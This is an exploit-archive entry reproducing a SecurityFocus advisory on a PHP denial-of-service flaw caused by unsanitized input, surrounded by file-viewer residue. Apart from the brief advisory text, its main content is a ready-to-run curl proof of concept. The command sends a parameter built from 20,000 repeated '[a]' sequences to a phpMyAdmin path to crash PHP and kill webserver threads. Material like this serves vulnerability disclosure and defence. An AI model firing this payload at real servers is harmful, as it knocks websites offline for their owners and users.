11 lines
No EOL
692 B
Text
11 lines
No EOL
692 B
Text
source: https://www.securityfocus.com/bid/22766/info
|
|
|
|
PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker with permissions to execute PHP code on an affected computer may exploit this issue to crash PHP and kill all remaining webserver threads. This will result in denial-of-service conditions.
|
|
|
|
Although this issue is local in nature, a remote attacker may exploit it by using other latent vulnerabilities such as a remote file-include issues; other remote attack vectors are also possible.
|
|
|
|
This issue affects all versions of PHP.
|
|
|
|
$ curl http://www.example.com/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1 |